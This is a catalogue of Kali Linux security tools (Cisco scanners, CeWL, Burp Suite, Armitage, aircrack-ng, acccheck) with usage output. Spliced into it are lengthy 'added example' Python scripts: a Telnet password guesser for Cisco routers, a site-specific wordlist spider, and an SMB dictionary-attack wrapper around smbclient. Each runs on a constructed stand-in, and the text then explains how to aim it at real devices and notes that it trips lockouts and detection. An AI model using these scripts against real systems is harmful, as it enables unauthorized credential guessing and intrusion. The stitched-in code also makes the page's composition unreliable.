cisco-auditing-tool – Scans Cisco routers for common vulnerabilities

Tool Description

Perl script which scans Cisco routers for common vulnerabilities (default Telnet port 23, SNMP community-name guessing, Telnet password guessing, and the IOS history bug check).

Tool Source: http://www.scrypt.net/

Kali Repo: http://git.kali.org/gitweb/?p=packages/cisco-auditing-tool.git;a=summary

General Details

root@kali:~# CAT

Cisco Auditing Tool - g0ne [null0]
Usage:
    -h hostname (for scanning single hosts)
    -f hostfile (for scanning multiple hosts)
    -p port #   (default port is 23)
    -w wordlist (wordlist for community name guessing)
    -a passlist (wordlist for password guessing)
    -i [ioshist]    (Check for IOS History bug)
    -l logfile  (file to log to, default screen)
    -q quiet mode   (no screen output)

Usage Example

Scan the host (-h 192.168.99.230) on port 23 (-p 23), using a password dictionary file (-a /usr/share/wordlists/nmap.lst):

root@kali:~# CAT -h 192.168.99.230 -p 23 -a /usr/share/wordlists/nmap.lst

Cisco Auditing Tool - g0ne [null0]

Checking Host: 192.168.99.230


Guessing passwords: 

Invalid Password: 123456
Invalid Password: 12345
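The exchange behind the output above, as an added example (not the cisco-auditing-tool source, which is Perl): a Telnet line-password guess consists of connecting, waiting for the IOS "Password:" prompt, sending one candidate, and treating an exec prompt (">" or "#") as success. Because there is no router to hand, the block starts a constructed in-process TCP server that mimics the IOS prompt with a made-up secret (SECRET, PROMPT and the "% Bad passwords" string are assumptions for the simulation, not captured from real gear) and runs the guessing loop against it on localhost.

```python
"""Telnet password guessing against a Cisco-style login prompt.

Added example, not CAT's own code.  The 'router' is a constructed stand-in
running in this process; the client side is the logic CAT's -a option drives.
"""
import socket
import socketserver
import threading

SECRET = "cisco123"  # constructed: the simulated router's line password
PROMPT = b"\r\nUser Access Verification\r\n\r\nPassword: "


class FakeIOSHandler(socketserver.BaseRequestHandler):
    """Constructed IOS-like telnet line login: one password attempt per connection."""

    def handle(self):
        self.request.sendall(PROMPT)
        data = b""
        while not data.endswith(b"\n") and len(data) < 256:
            chunk = self.request.recv(64)
            if not chunk:
                return
            data += chunk
        if data.strip().decode(errors="replace") == SECRET:
            self.request.sendall(b"\r\nRouter>")  # exec prompt: login succeeded
        else:
            self.request.sendall(b"\r\n% Bad passwords\r\n")  # then the server closes


def start_fake_router():
    """Start the simulated router on an ephemeral localhost port; return (server, port)."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeIOSHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def recv_until(sock, marker, limit=4096):
    """Read until `marker` appears, the peer closes, or the read times out."""
    buf = b""
    while marker not in buf and len(buf) < limit:
        try:
            chunk = sock.recv(512)
        except socket.timeout:
            break
        if not chunk:
            break
        buf += chunk
    return buf


def try_password(host, port, password, timeout=3.0):
    """One login attempt; True only if an exec prompt ('>' or '#') comes back."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = recv_until(s, b"Password:")
        if b"Password:" not in banner:
            return False  # no line password prompt: nothing to guess against
        s.sendall(password.encode() + b"\r\n")
        reply = recv_until(s, b">")
    return reply.rstrip().endswith((b">", b"#"))


def guess_passwords(host, port, wordlist):
    """Walk the wordlist like CAT -a; return the first working password or None."""
    for candidate in wordlist:
        if try_password(host, port, candidate):
            return candidate
        print(f"Invalid Password: {candidate}")
    return None


if __name__ == "__main__":
    server, port = start_fake_router()
    try:
        # Constructed wordlist: the first two entries match the page's sample output.
        print("Found:", guess_passwords("127.0.0.1", port, ["123456", "12345", "cisco123"]))
    finally:
        server.shutdown()
        server.server_close()
```

Against a real device, replace the fake server with the router's address and port 23; the per-connection pattern matters because IOS drops the session after a few bad attempts, and every attempt leaves a line in the device log, so this is noisy by design.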

Video Tutorial: Coming Soon!

cisco-torch – Cisco device scanner

Tool Description

Cisco Torch is a mass scanning, fingerprinting, and exploitation tool. It was written while working on the next edition of “Hacking Exposed Cisco Networks”, since the tools available on the market could not meet our needs.

The main feature that sets Cisco-torch apart from similar tools is its extensive use of forking to launch multiple scanning processes in the background for maximum scanning efficiency. It can also apply several application-layer fingerprinting methods simultaneously when needed. We wanted something fast to discover remote Cisco hosts running Telnet, SSH, Web, NTP and SNMP services and to launch dictionary attacks against the services discovered.

Tool Source: http://www.hackingciscoexposed.com/?link=tools

Kali Repo: http://git.kali.org/gitweb/?p=packages/cisco-torch.git;a=summary

Video Tutorial: Coming Soon!

CeWL – Custom wordlist generator

Tool Description

CeWL is a Ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used with password crackers such as John the Ripper.

CeWL also has an associated command line app, FAB (Files Already Bagged), which uses the same metadata extraction techniques to create author/creator lists from files that have already been downloaded.
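What "spider to a depth and return words" amounts to, as an added example (not CeWL's code, which is Ruby): a breadth-first crawl bounded by depth, a same-host rule that an offsite flag relaxes, visible-text extraction with a minimum word length, occurrence counting, and the author/creator metadata that FAB pulls from `<meta>` tags. To run offline the block walks a constructed in-memory site (the SITE dict stands in for HTTP fetches; the URLs, pages and names in it are made up).

```python
"""Spider-to-depth word harvesting in the style of CeWL/FAB.

Added example, not CeWL's code.  `fetch` looks pages up in a constructed
dict instead of doing HTTP, so the crawl runs without a network.
"""
import re
from collections import Counter, deque
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample site: URL -> HTML.  Everything in it is made up for the example.
SITE = {
    "http://example.test/": """<html><head><title>Acme Widgets</title>
        <meta name="author" content="Jane Roe"></head>
        <body><h1>Acme Widgets</h1><p>Welcome to Acme. Our Gizmotron product
        line ships in March.</p><a href="/about">About</a>
        <a href="http://partner.test/news">Partner</a></body></html>""",
    "http://example.test/about": """<html><body><p>Acme was founded by Jane Roe.
        Gizmotron is our flagship.</p><a href="/careers">Careers</a></body></html>""",
    "http://example.test/careers": """<html><body><p>Join the Gizmotron team.</p></body></html>""",
    "http://partner.test/news": """<html><body><p>Partner News: Acme Gizmotron launch</p></body></html>""",
}


class PageParser(HTMLParser):
    """Collect visible text, link targets and meta author/creator names from one page."""

    def __init__(self):
        super().__init__()
        self.text, self.links, self.authors = [], [], []
        self._skip = 0  # depth inside <script>/<style>, whose text is not 'words'

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "style"):
            self._skip += 1
        elif tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "meta" and (a.get("name") or "").lower() in ("author", "creator") and a.get("content"):
            self.authors.append(a["content"])

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.text.append(data)


def fetch(url):
    """Stand-in for an HTTP GET: return the constructed page, or None if unknown."""
    return SITE.get(url)


def cewl(start_url, depth=2, min_length=3, offsite=False):
    """Breadth-first spider from start_url down to `depth` link hops.

    Returns (Counter of word -> occurrences, list of author/creator names).
    depth=0 means the start page only; offsite=True also follows links to other hosts.
    """
    word_re = re.compile(r"[A-Za-z]{%d,}" % min_length)
    home = urlparse(start_url).netloc
    words, authors, seen = Counter(), [], set()
    frontier = deque([(start_url, 0)])
    while frontier:
        url, d = frontier.popleft()
        if url in seen or d > depth:
            continue
        seen.add(url)
        html = fetch(url)
        if html is None:
            continue
        p = PageParser()
        p.feed(html)
        words.update(word_re.findall(" ".join(p.text)))
        authors.extend(a for a in p.authors if a not in authors)
        for href in p.links:
            target = urljoin(url, href)
            if offsite or urlparse(target).netloc == home:
                frontier.append((target, d + 1))
    return words, authors


def wordlist_lines(words):
    """Render the counter the way a cracker wants it: most frequent word first."""
    return [w for w, _ in words.most_common()]


if __name__ == "__main__":
    found, who = cewl("http://example.test/", depth=2)
    print("\n".join(wordlist_lines(found)))
    print("authors:", who)
```

Feeding the output straight to a cracker is the normal use; the frequency ordering puts the words most characteristic of the target (product names, founders) at the top, which is exactly why a site-specific list outperforms a generic one.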

Tool Source: http://www.digininja.org/projects/cewl.php

Kali Repo: http://git.kali.org/gitweb/?p=packages/cewl.git;a=summary

Video Tutorial: Coming Soon!

BurpSuite – Platform for security testing of web applications

Tool Description

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

Tool Source: http://portswigger.net/burp/

Kali Repo: http://git.kali.org/gitweb/?p=packages/burpsuite.git;a=summary

Video Tutorial: Coming Soon!

Armitage – Red Team collaboration tool

Tool Description

Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

Through one Metasploit instance, your team will:

  • Use the same sessions
  • Share hosts, captured data, and downloaded files
  • Communicate through a shared event log
  • Run bots to automate red team tasks

Armitage is a force multiplier for red team operations.

Tool Source: http://www.fastandeasyhacking.com/manual#0

Kali Repo: http://git.kali.org/gitweb/?p=packages/armitage.git;a=summary

Included Tools:

  • Armitage
  • Teamserver

Video Tutorial: Coming Soon!


AIRCRACK-NG

Tool Description

Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking program that can recover keys once enough data packets have been captured. For WEP it implements the standard FMS attack along with optimisations such as the KoreK attacks, as well as the PTW attack, which makes it much faster than other WEP cracking tools. WPA-PSK is not broken statistically: the key is recovered by a dictionary attack against a captured four-way handshake, so success depends on the wordlist.

Tool Source: http://aircrack-ng.org/

Kali Repo: http://git.kali.org/gitweb/?p=packages/aircrack-ng.git;a=summary

Included Tools:

  • airbase-ng – Configure fake access points
  • aircrack-ng – Wireless password cracker
  • airdecap-ng – Decrypt WEP/WPA/WPA2 capture files
  • airdecloak-ng – Removes WEP cloaking from a pcap file
  • airdriver-ng – Provides status information about the wireless drivers on your system
  • aireplay-ng – Primary function is to generate traffic for later use in aircrack-ng
  • airmon-ng – This script can be used to enable monitor mode on wireless interfaces
  • airmon-zc – Newer rewrite of airmon-ng with the same purpose (enable monitor mode on wireless interfaces)
  • airodump-ng – Used for packet capturing of raw 802.11 frames
  • airodump-ng-oui-update – Downloads and parses IEEE OUI list
  • airolib-ng – Designed to store and manage essid and password lists
  • airserv-ng – A wireless card server
  • airtun-ng – Virtual tunnel interface creator
  • besside-ng – Automatically crack WEP and WPA networks
  • buddy-ng – Helper server that easside-ng talks to
  • easside-ng – An auto-magic tool which allows you to communicate via an WEP-encrypted access point
  • ivstools – This tool handle .ivs files. You can either merge or convert them
  • kstats – Shows the FMS algorithm votes for an .ivs dump against a specified WEP key
  • makeivs-ng – Generates initialization vectors
  • packetforge-ng – Create encrypted packets that can subsequently be used for injection
  • tkiptun-ng – This tool is able to inject a few frames into a WPA TKIP network with QoS
  • wesside-ng – Auto-magic tool which incorporates a number of techniques to seamlessly obtain a WEP key
  • wpaclean – Remove excess data from a pcap file

Video Tutorial: Coming Soon!

ACCCHECK – Password dictionary attack tool for SMB

Tool Description

The tool is designed as a password dictionary attack tool that targets Windows authentication via the SMB protocol. It is really a wrapper script around the ‘smbclient’ binary, and is therefore dependent on it for its execution.

Tool Source: https://labs.portcullis.co.uk/tools/acccheck/

Kali Repo: http://git.kali.org/gitweb/?p=packages/acccheck.git;a=summary

General Details

root@kali:~# acccheck

acccheck v0.2.1 - By Faiz

Description:
Attempts to connect to the IPC$ and ADMIN$ shares depending on which flags have been
chosen, and tries a combination of usernames and passwords in the hope to identify
the password to a given account via a dictionary password guessing attack.

Usage = ./acccheck [optional]

 -t [single host IP address]
 OR
 -T [file containing target ip address(es)]

Optional:
 -p [single password]
 -P [file containing passwords]
 -u [single user]
 -U [file containing usernames]
 -v [verbose mode]

Examples
Attempt the 'Administrator' account with a [BLANK] password.
    acccheck -t 10.10.10.1
Attempt all passwords in 'password.txt' against the 'Administrator' account.
    acccheck -t 10.10.10.1 -P password.txt
Attempt all passwords in 'password.txt' against all users in 'users.txt'.
    acccheck -t 10.10.10.1 -U users.txt -P password.txt
Attempt a single password against a single user.
    acccheck -t 10.10.10.1 -u administrator -p password

Usage Example

root@kali:~# acccheck.pl -T smb-ips.txt -v
Host:192.168.1.201, Username:Administrator, Password:BLANK
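The wrapper pattern acccheck describes, as an added example (not acccheck's code): every target is tried with every user and password combination, defaulting to 'Administrator' with a blank password, and each attempt is a single smbclient connect to IPC$ whose exit status decides success. The `try_login` parameter is pluggable so the matrix logic can be exercised without a live SMB target; stopping on the first hit for an account is this example's choice, not documented acccheck behaviour. The hostnames and credentials in the usage are constructed.

```python
"""SMB dictionary attack matrix wrapped around smbclient, in the style of acccheck.

Added example, not acccheck's code.  smbclient_login is the real attempt;
attack() is the user x password x target loop that drives it.
"""
import subprocess


def smbclient_login(host, user, password, share="IPC$"):
    """One real attempt: connect to //host/share with smbclient and exit.

    smbclient returns 0 when the session and tree connect succeed; -N suppresses
    the password prompt when the password is blank.  Returns False if smbclient
    is missing or the target does not answer in time.
    """
    cmd = ["smbclient", f"//{host}/{share}", "-U", f"{user}%{password}", "-c", "exit"]
    if not password:
        cmd.append("-N")
    try:
        return subprocess.run(cmd, capture_output=True, text=True, timeout=15).returncode == 0
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return False


def load_list(path):
    """Read one entry per line, skipping blanks (for -T/-U/-P style files)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return [line.rstrip("\r\n") for line in fh if line.strip()]


def format_hit(hit):
    """Render a result the way the acccheck output above does."""
    host, user, password = hit
    return f"Host:{host}, Username:{user}, Password:{password or 'BLANK'}"


def attack(targets, users=None, passwords=None, try_login=smbclient_login, verbose=False):
    """Try every user x password against every target.

    Defaults mirror acccheck's own Examples: user 'Administrator', blank password.
    Moves on to the next user once a password works (this example's choice).
    Returns a list of (host, user, password) hits.
    """
    users = users or ["Administrator"]
    passwords = passwords if passwords is not None else [""]
    hits = []
    for host in targets:
        for user in users:
            for password in passwords:
                ok = try_login(host, user, password)
                if verbose:
                    print(format_hit((host, user, password)), "SUCCESS" if ok else "failed")
                if ok:
                    hits.append((host, user, password))
                    break
    return hits


if __name__ == "__main__":
    # Constructed stand-in for a live target so the example runs offline.
    fake_creds = {("192.168.1.201", "Administrator", "")}
    fake_login = lambda h, u, p: (h, u, p) in fake_creds
    for hit in attack(["192.168.1.201", "192.168.1.202"], try_login=fake_login):
        print(format_hit(hit))
```

On a real engagement, pass `load_list("smb-ips.txt")` as `targets` and leave `try_login` at its default; mind that each guess is a failed logon event (4625) on the target, so long wordlists against domain accounts will trip lockout policies as well as detection.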

Video Tutorial: Coming Soon!